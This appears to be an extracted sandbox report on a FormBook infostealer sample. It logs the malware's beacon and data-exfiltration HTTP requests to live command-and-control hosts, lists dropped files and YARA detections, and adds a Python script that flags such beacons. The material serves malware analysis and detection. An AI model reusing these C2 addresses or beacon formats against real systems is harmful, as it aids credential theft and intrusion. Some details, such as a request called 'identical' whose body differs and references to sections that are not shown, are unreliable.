49 4a 53 6f 75 50 37 5f 7e 56 49 66 6b 7a 4e 72 74 45 32 41 61 39 5a 63 70 6a 4a 4a 51 39 4d 59 54 4f 6e 38 6f 39 32 76 67 43 6a 4f 54 45 4b 74 70 4d 66 62 68 49 6c 2d 5a 5f 46 58 7a 5f 64 67 6e 31 6f 74 49 56 72 68 48 69 55 45 33 4b 68 65 63 56 49 6e 59 4f 6c 4e 59 66 43 79 52 5
- Source: global traffic, HTTP traffic detected:
  POST /k8b/ HTTP/1.1
  Host: www.camdio.xyz
  Connection: close
  Content-Length: 414
  Cache-Control: no-cache
  Origin: http://www.camdio.xyz
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.camdio.xyz/k8b/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 4c 77 5a 72 56 34 35 66 51 6e 79 35 68 43 34 53 66 56 36 62 45 7e 68 47 72 6a 4d 48 37 30 42 6d 68 36 66 6b 33 6a 77 41 72 52 6e 6d 33 62 44 71 33 4d 42 76 41 72 53 46 58 47 41 55 58 63 4c 45 38 6e 75 6c 46 70 6c 63 43 6b 74 68 35 4c 6d 67 51 75 6c 64 68 74 61 73 76 71 30 73 37 7a 59 63 4f 58 56 39 79 47 6e 39 49 28 69 73 43 76 47 33 6f 6c 42 58 5f 5a 47 52 77 62 6d 47 76 54 5a 47 6a 53 65 6f 65 39 51 4e 5f 42 6c 64 38 34 65 33 78 66 4a 6e 6f 5a 4b 76 62 6e 66 64 71 72 64 35 53 56 48 69 75 4d 4a 72 6f 6e 4c 37 47 72 5a 65 5a 79 68 57 68 51 45 57 4a 75 48 48 58 4d 43 31 34 6c 46 54 39 4b 42 7e 67 56 31 62 6c 71 55 55 38 5a 59 6f 4c 74 6e 6b 5a 6e 39 74 55 59 75 63 55 30 42 36 5a 47 79 32 4d 47 31 35 6e 41 4a 7a 79 7e 69 32 72 43 35 6e 6d 6e 6a 42 56 28 54 47 4d 70 75 4a 6b 32 64 6a 4f 59 35 57 59 44 30 79 41 75 73 33 4d 65 55 55 4c 4a 69 5a 4a 70 35 4a 42 64 64 48 37 47 45 31 6d 51 35 4e 4d 65 67 46 54 4c 6c 64 5f 68 71 50 65 6a 79 42 35 38 46 54 30 76 57 69 66 31 66 42 51 62 47 46 32 6b 71 37 6f 64 34 77 2d 53 62 6a 53 48 31 4d 67 44 43 49 6d 67 70 6c 5f 32 6a 55 71 39 72 47 37 4c 63 32 48 78 6f 57 52 70 67 4f 68 61 38 6f 48 31 59 51 67 72 45 75 37 72 6b 5a 47 47 69 42 77 29 2e 00 5f 53 50 6b 46 67 71
  Data Ascii: 8pMx8v9p=niUgMLwZrV45fQny5hC4SfV6bE~hGrjMH70Bmh6fk3jwArRnm3bDq3MBvArSFXGAUXcLE8nulFplcCkth5LmgQuldhtasvq0s7zYcOXV9yGn9I(isCvG3olBX_ZGRwbmGvTZGjSeoe9QN_Bld84e3xfJnoZKvbnfdqrd5SVHiuMJronL7GrZeZyhWhQEWJuHHXMC14lFT9KB~gV1blqUU8ZYoLtnkZn9tUYucU0B6ZGy2MG15nAJzy~i2rC5nmnjBV(TGMpuJk2djOY5WYD0yAus3MeUULJiZJp5JBddH7GE1mQ5NMegFTLld_hqPejyB58FT0vWif1fBQbGF2kq7od4w-SbjSH1MgDCImgpl_2jUq9rG7Lc2HxoWRpgOha8oH1YQgrEu7rkZGGiBw)._SPkFgq
- Source: global traffic, HTTP traffic detected:
  POST /k8b/ HTTP/1.1
  Host: www.camdio.xyz
  Connection: close
  Content-Length: 167694
  Cache-Control: no-cache
  Origin: http://www.camdio.xyz
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.camdio.xyz/k8b/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw (cut off in this extraction): 38 70 4d 78 38 76 39 70 3d 6e 69 55 67 4d 50 4e 6f 70 6c 38 73 56 43 7a 7a 28 78 79 67 44 50 6c 6f 52 6a 76 38 50 5a 6a 32 4b 4d 4d 52 6d 68 4b 62 69 30 72 75 4b 72 42 6e 67 78 76 45 77 6e 4d 47 74 41 72 52 42 58 4b 4f 64 6d 34 54 45 35 65 4c 6c 46 78 6d 58 67 38 6f 68 4a 4c 39 78 41 6a 57 62 68 35 37 73 74 75 6e 76 59 66 32 58 75 54 56 7a 69 4f 35 7a 4e 61 6b 37 77 4c 5a 36 34 6f 4c 56 2d 42 66 53 48 6a 53 55 5f 4c 6e 42 69 50 34 76 70 42 62 49 38 5a 65 66 62 6b 76 71 52 4c 45 71 37 6b 4d 67 63 33 6c 63 75 47 6f 67 6a 56 41 7e 71 6f 4c 75 71 7e 68 7e 33 76 4b 63 4b 71 66 57 69 78 7a 65 66 4f 57 44 57 41 4b 6d 35 70 6a 5a 6f 71 48 6a 42 55 6d 4d 57 44 75 53 38 4a 6e 67 75 52 67 67 4a 61 39 73 57 52 31 45 52 59 51 34 6f 4b 32 34 59 43 4e 35 30 73 42 78 79 4f 64 69 35 69 69 7e 6d 48 37 43 57 54 70 49 4d 70 46 4c 6b 32 5a 77 2d 34 52 54 74 6a 76 34 78 65 43 32 4e 61 41 51 66 78 6a 61 4d 31 6c 4d 67 46 32 46 4b 65 44 68 47 42 47 61 4d 61 72 47 42 57 54 58 66 68 6d 42 4d 4c 31 42 35 38 4a 54 31 76 77 69 72 6c 66 54 79 44 72 42 58 6b 32 35 6f 64 66 79 4b 32 5a 71 41 44 6c 4d 67 4c 43 49 58 51 48 33 66 4f 6a 46 4d 52 6f 47 5a 7a 63 31 33 78 6f 44 42 6f 6f 49 42 62 4d 68 47 4e 48 43 78 75 36 73 37 53 61 4e 56 4c 36 61 54 6f 69 38 7a 4e 45 71 45 4d 31 6f 46 58 35 41 54 58 75 77 41 4d 62 79 6a 4a 64 33 77 4a 53 56 44 51 4f 64 73 79 4a 4a 4a 78 6a 68 41 78 31 69 6a 39 4f 4b 38 51 4c 68 53 68 66 5a 4c 4a 44 4c 68 66 6c 54 32 72 64 47 67 41 62 36 59 73 37 6e 6f 71 62 41 33 78 43 34 51 6f 43 69 71 78 7a 64 33 77 44 53 46 61 74 52 61 59 30 6c 56 56 4f 68 53 76 44 6f 53 48 34 64 57 4c 39 55 58 6f 62 6b 6e 4f 61 35 68 6d 55 67 41 67 55 63 37 48 46 41 5a 4a 56 65 73 41 4d 71 4f 67 32 4b 50 77 79 37 5a 4d 48 34 36 67 59 58 51 41 4d 64 30 72 49 50 5a 62 44 47 73 4d 4f 61 51 4d 79 74 6c 71 36 34 78 76 46 74 69 6d 75 42 67 46 75 58 54 50 62 67 48 6a 61 7a 70 65 64 6f 43 39 5a 61 6c 6b 5a 56 44 79 52 6d 58 76 73 39 56 79 48 47 65 42 72 46 35 4e 4e 4a 50 36 79 52 69 46 64 47 4a 52 79 39 52 37 41 70 61 75 69 30 69 75 5a 69 45 47 50 50 72 6c 41 5a 7a 59 51 30 73 4d 4c 58 79 74 33 6d 6a 49 66 33 30 65 53 5a 71 76 30 50 42 4b 49 37 2d 75 61 45 68 41 39 58 49 34 55 28 63 64 51 51 72 77 33 34 5f 28 57 4b 57 52 74 6b 4e 4f 37 65 41 34 75 4d 41 72 50 6d 6a 4f 6d 73 50 68 36 48 64 50 30 4a 4c 36 4d 69 58 6a 76 68 79 30 74 78 62 62 34 51 61 58 79 71 38 4d 64 78 59 30 78 7e 69 6e 31 61 57 7e 37 77 55 58 79 57 39 69 30 78 66 54 7a 47 54 49 65 65 39 35 39 61 6b 64 68 28 70 6a 7a 4a 59 69 72 50 33 79 59 7e 6c 79 33 47 7a 45 43 64 31 73 41 62 6c 67 35 57 4b 4e 72 54 57 47 78 7e 7a 58 49 65 73 72 4
Downloads files from webservers via HTTP
- Source: global traffic, HTTP traffic detected:
  GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1
  Host: www.mensajera-radio.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (no printable bytes)
- Source: global traffic, HTTP traffic detected:
  GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1
  Host: www.camdio.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (no printable bytes)

Performs DNS lookups
- Source: unknown, DNS traffic detected: queries for: www.mensajera-radio.online
Posts data to webserver
- Source: unknown, HTTP traffic detected:
  POST /k8b/ HTTP/1.1
  Host: www.mensajera-radio.online
  Connection: close
  Content-Length: 414
  Cache-Control: no-cache
  Origin: http://www.mensajera-radio.online
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.mensajera-radio.online/k8b/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: identical to the first POST listed under "Uses a known web browser user agent for HTTP communication" above (same 414-byte body followed by eight NUL bytes)
  Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw).
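The requests listed under "HTTP GET or POST without a user agent", "Uses a known web browser user agent for HTTP communication" and "Posts data to webserver" share one shape: a GET to /k8b/ carrying one long query-string blob, no User-Agent and a trailer of NUL bytes, then a POST to the same path with the Trident/7.0 User-Agent, an Origin and Referer that point back at the C2, and a single form field whose value uses a base64-like alphabet extended with ( ) ~ - _. The script below is an added example, not the sandbox's signature logic: it parses raw requests and scores those traits. The first two requests are rebuilt from the headers printed above (the POST body is shortened, so its Content-Length no longer matches), the other two are constructed benign requests; the indicator names and the final rule are mine.

```python
# Added example: heuristics for the FormBook-style beacons in the Networking section.
# Not the sandbox's code. The two C2 requests reuse the headers printed in the report
# (POST body shortened); the benign requests are constructed. Indicator names are mine.
import re
from urllib.parse import urlsplit

TRIDENT_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
# Alphabet of the blobs seen above: base64-like plus ( ) ~ - _ and an optional trailing '.'
BLOB_RE = re.compile(r"^[A-Za-z0-9+/()~_-]{32,}\.?$")


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, lower-cased header names, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def _params(encoded: str) -> dict:
    """Split k=v&k=v without percent-decoding: '+' and '/' are part of the blobs, not encoding."""
    out = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            out[key] = value
    return out


def beacon_indicators(req: dict) -> list:
    h = req["headers"]
    url = urlsplit(req["target"])
    found = []
    stripped = req["body"].rstrip(b"\x00")
    if len(stripped) < len(req["body"]):
        found.append("nul_trailer")            # NUL bytes after the real payload (7 on GET, 8 on POST above)
    if req["method"] == "GET":
        if "user-agent" not in h:
            found.append("get_without_user_agent")
        if any(BLOB_RE.match(v) for v in _params(url.query).values()):
            found.append("query_blob")
    elif req["method"] == "POST":
        if h.get("user-agent") == TRIDENT_UA:
            found.append("trident_ua")
        if h.get("content-type") == "application/x-www-form-urlencoded":
            if any(BLOB_RE.match(v) for v in _params(stripped.decode("latin-1")).values()):
                found.append("form_blob")
        if "origin" in h and h.get("referer") == h["origin"] + url.path:
            found.append("self_referer")       # Origin and Referer both point at the C2 itself
    return found


def formbook_like(reqs: list) -> set:
    """(host, path) pairs that saw both a UA-less GET with a query blob and a Trident POST with a form blob."""
    by_key = {}
    for r in reqs:
        key = (r["headers"].get("host", ""), urlsplit(r["target"]).path)
        by_key.setdefault(key, set()).update(beacon_indicators(r))
    need = {"get_without_user_agent", "query_blob", "trident_ua", "form_blob"}
    return {key for key, inds in by_key.items() if need <= inds}


SAMPLE_REQUESTS = [
    # GET as printed in the report for www.camdio.xyz, followed by the seven NUL bytes it sent
    (b"GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1\r\n"
     b"Host: www.camdio.xyz\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    # POST with the headers printed in the report; body shortened (constructed), so Content-Length no longer matches
    (b"POST /k8b/ HTTP/1.1\r\nHost: www.camdio.xyz\r\nConnection: close\r\nContent-Length: 414\r\n"
     b"Cache-Control: no-cache\r\nOrigin: http://www.camdio.xyz\r\n"
     b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
     b"Referer: http://www.camdio.xyz/k8b/\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
     b"8pMx8v9p=niUgMLwZrV45fQny5hC4SfV6bE~hGrjMH70Bmh6fk3jwArRnm3bDq3MBvArSFXGAUXcLE8nulFplcCkth5LmgQ(isCvG3olBX_ZGRwbmGvTZGjSeoe9QN_Bld84e3x-SbjSH1MgDCImgpl)." + b"\x00" * 8),
    # constructed benign traffic for contrast
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n",
    (b"POST /login HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/80.0\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n\r\nuser=alice&pass=secret"),
]


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for req in parsed:
        print(req["method"], req["headers"].get("host"), urlsplit(req["target"]).path, beacon_indicators(req))
    print("beaconing to:", formbook_like(parsed))
```

The pairing matters more than any single trait: a UA-less GET on its own is common in automation, and the Trident string is a legitimate IE11 User-Agent. Nor do the 404 and 403 responses in this run mean the infection is inert; FormBook carries a list of candidate hosts and works through them, which is why both www.mensajera-radio.online and www.camdio.xyz appear here with the same /k8b/ path.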
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
- Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Sat, 12 Sep 2020 13:00:22 GMT
  Server: Apache/2.4.29 (Ubuntu)
  Content-Length: 327
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii (rendered HTML text):
  404 Not Found
  Not Found
  The requested URL /k8b/ was not found on this server.
  Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Urls found in memory or binary data
- http://crl.globalsign.net/root-r2.crl0 (source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmp)
- http://en.ws (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356903689.0000000004BBC000.00000004.00000001.sdmp)
- http://fontfabrik.com (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://schemas.mioft.com/win/2004/08/events/e (source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmp)
- http://tempuri.org/DataSet1.xsd (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmp)
- http://www.%s.comPA (source: explorer.exe, 00000004.00000000.379746534.0000000002280000.00000002.00000001.sdmp)
- http://www.apache.org/licenses/LICENSE-2.0 (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357829186.0000000004BBF000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.autoitscript.com/autoit3/J (source: explorer.exe, 00000004.00000000.395898665.0000000007C99000.00000004.00000001.sdmp)
- http://www.camdio.xyz (source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmp)
- http://www.camdio.xyz/k8b/ (source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmp)
- http://www.carterandcone.coml (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers (source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers/? (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers/cabarga.htmlN (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers/frere-jones.html (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers8 (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designers? (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designersG (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.fontbureau.com/designersP (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359230035.0000000004BCB000.00000004.00000001.sdmp)
- http://www.fontbureau.com/designersS (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.362113660.0000000004BC7000.00000004.00000001.sdmp)
- http://www.fontbureau.com/designersd (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359095944.0000000004BCB000.00000004.00000001.sdmp)
- http://www.fontbureau.comcomf6 (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmp)
- http://www.fontbureau.coml1 (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmp)
- http://www.fonts.com (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.founder.com.cn/cn (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357463705.0000000004BEE000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.founder.com.cn/cn/bThe (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.founder.com.cn/cn/cThe (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.founder.com.cn/cnd (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357481879.0000000004BBC000.00000004.00000001.sdmp)
- http://www.galapagosdesign.com/DPlease (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.galapagosdesign.com/staff/dennis.htm (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.galapagosdesign.com/staff/dennis.htm/EN (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.360449526.0000000004BC7000.00000004.00000001.sdmp)
- http://www.goodfont.co.kr (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.jiyu-kobo.co.jp/ (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.microsoftEl. (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357880495.0000000004BBF000.00000004.00000001.sdmp)
- http://www.sajatypeworks.com (source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356332227.0000000004BCB000.00000004.00000001.sdmp; uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.sakkal.com (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.sandoll.co.kr (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.tiro.com (source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.typography.netD (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.urwpp.deDPlease (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- http://www.zhongyicts.com.cn (source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp; explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp)
- https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: (source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp)
- (entry cut off in this extraction) source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in
binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com:: Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 Source: cmd.exe, 0000000D.00000002.619133496.00000000004F8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033 Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp, cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Creates a DirectInput object (often for capturing keystrokes)

- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match File source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

Detected FormBook malware

- Source: C:\Windows\SysWOW64\cmd.exe Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini
- Source: C:\Windows\SysWOW64\cmd.exe Dropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.ini
Malicious sample detected (through community Yara rule)

Every source below matched both community rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group).

- Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
- Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
- Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
- Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
- Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
- Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Contains functionality to call native functions

| Image | Code function | Native call chain |
|---|---|---|
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 0_2_04A60BEE | NtQuerySystemInformation |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 0_2_04A60BB3 | NtQuerySystemInformation |
